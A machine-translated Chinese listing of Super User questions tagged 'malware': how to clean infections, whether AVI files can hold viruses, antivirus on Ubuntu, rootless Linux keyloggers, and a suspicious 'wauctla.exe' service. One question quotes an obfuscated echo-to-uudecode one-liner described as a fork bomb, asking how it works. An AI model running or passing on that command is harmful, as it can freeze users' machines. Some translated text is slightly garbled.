Questions tagged «malware»

恶意软件(“恶意软件”的缩写)是一种设计用于未经所有者事先知情同意而访问计算机系统的软件。

19
如何从PC上删除恶意间谍软件,恶意软件,广告软件,病毒,特洛伊木马或Rootkit?
如果Windows计算机似乎感染了病毒或恶意软件,该怎么办? 感染的症状是什么? 注意到感染后该怎么办? 我该怎么做才能摆脱它? 如何防止恶意软件感染? 这个问题经常出现,建议的解决方案通常是相同的。该社区Wiki试图充当最终的,最全面的答案。 随时通过编辑添加您的贡献。

3
这串文字怎么以及为什么是叉子炸弹?
在随机陈板上找到: echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode 以某种方式运行此操作会导致无限的生成过程,该过程猖ramp运行,并使机器停止运转。我看到有关“ su”的尝试多次执行的信息。 ..这很奇怪,因为我只希望输出文本,而不执行任何内容。 通过在线解码器运行此文本只会给我一批二进制代码: 这种乱七八糟的文本实际上是做什么的,有没有办法“安全”地查看它?


15
如何修复感染了恶意软件且反应迟钝的计算机?[重复]
可能重复: 如何从PC上清除恶意间谍软件,恶意软件,病毒或Rootkit? 我正在为朋友对Windows 7 PC进行故障排除。几天前,它开始运行“缓慢”。事实证明,“慢”大约需要15分钟才能看到桌面,另外30分钟可以显示图标。它是可以打开任务管理器,似乎没有任何出错,CPU占用率在1-5%,大量的可用内存。 不过,这台机器显然感染了恶意软件,特别是一个名为“ Optimizer Pro”的程序要钱,要求“删除5102个文件,使我的计算机变慢”。这似乎非常可疑。 但我的问题是,我无法访问msconfig(希望将其输入到“开始”菜单并按Enter键后,我将其保留了几个小时-似乎未加载任何内容),或者根本什么都无法访问。我可以从Linux Live CD引导,但实际上可以从那里做任何有用的事情吗? 系统还原也没有修复它,并且安全模式表现出相同的行为。
103 windows-7  malware 

23
如何为家庭用户制作Windows PC防弹产品?[关闭]
我意识到Windows PC上的防病毒功能远不可取,但是为了将花费在“家庭技术支持”上的时间降到最低,我正在寻找将计算机锁定到一定程度的想法。很难收集广告软件/间谍软件,恶意软件或病毒。 假设用户是我的妈妈,很少(如果需要的话)需要管理员访问权限,并且大多将计算机用于MS Office和Web浏览。

15
AVI文件可以包含病毒吗?
我正在通过torrent 下载AVI文件,但是我的防病毒软件检测到某些东西。AVI文件是否可能包含病毒? 由于种子文件有很多正面评价,这很奇怪。
99 virus  malware  avi 


6
在Ubuntu上安装防病毒软件有什么意义吗?
我最近开始使用Ubuntu。我想知道在Ubuntu上安装防病毒程序的意义。在SuperUser上,我发现它只能检测“ Windows病毒”并将其删除。如果没有其他操作系统,安装防病毒软件是否有意义? 据我所知,没有针对Linux的病毒。那么恶意软件和任何其他有害程序呢?不安装任何保护软件是否安全?

3
如何确定窗口属于哪个进程?
最近,每次启动Windows Vista时,都会看到一个随机的浮动窗口。这是一个很小的小窗口,没有标题,只有调整大小,最大化和还原按钮。我会发布图片,但是在这里还没有声誉。 我可以将其关闭,但确实可以使用,但是我很想弄清楚它是什么,并阻止它突然弹出。我在上面使用了Autohotkey的窗口监视程序,我了解到的是它是一个旋转窗口,对我没有太大帮助。 有没有很好的方法来确定它属于哪个进程并弄清楚如何杀死它?

8
没有root或sudo的Linux键盘记录程序!这是真的吗?
Youtube上的某人声称在Ubuntu上有一个键盘记录器,该键盘记录器既未执行也不以root身份安装。下面的链接显示了其工作的演示。 http://www.youtube.com/watch?v=Y1fZAZTwyPQ 尽管他们有相反的说法,但该人可以在演示视频之前以root用户身份安装它。是否还有其他半可信的证据表明,没有root用户就可以进行安装或执行,这真的可能吗? 更新:如果没有sudo / root,将无法安装6月24日答案中引用的软件。我向任何提供了可正常运行的Linux键盘记录器软件链接的人添加了一笔赏金,该软件可以常规用户权限安装和运行。





2
发现防病毒未检测到新的恶意软件。如何评估威胁?
在运行最新防病毒套件(卡巴斯基)的Windows 7工作站上,我发现了几个可疑进程。为了查看流程活动,我使用了SysInternals的优秀ProcessMonitor。 其中一个有可执行文件名 wauctla.exe 位于 C:\Windows。 更新: 这个名字可能是故意选择与之混淆的 wuauclt.exe - Windows Update代理控制实用程序。 此过程作为系统服务运行。使用管理控制台服务管理单元,我能够将此过程的启动设置从“自动”更改为“已禁用”。但是我无法通过MMC管理单元停止运行过程。 我仍然设法停止了这个过程 taskkill /f /PID 命令。我重新启动了操作系统,进程列表中不再显示该进程。 有一个 优秀的线程 在超级用户上执行从运行Windows的计算机中删除通用恶意软件所需的过程。当可疑进程已停止并且其可执行文件移动到远离可执行搜索路径的安全位置时,我想了解有关新恶意软件的更多信息。 这个文件有什么样的威胁?是否有可以检测到这种病毒的防病毒软件?它是如何传播的,我应该检查在该工作站被感染后由同一用户访问的其他计算机吗? 更新2: 关于virustotal的答案,这里是 一条链接 对这一恶意软件的总结。

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.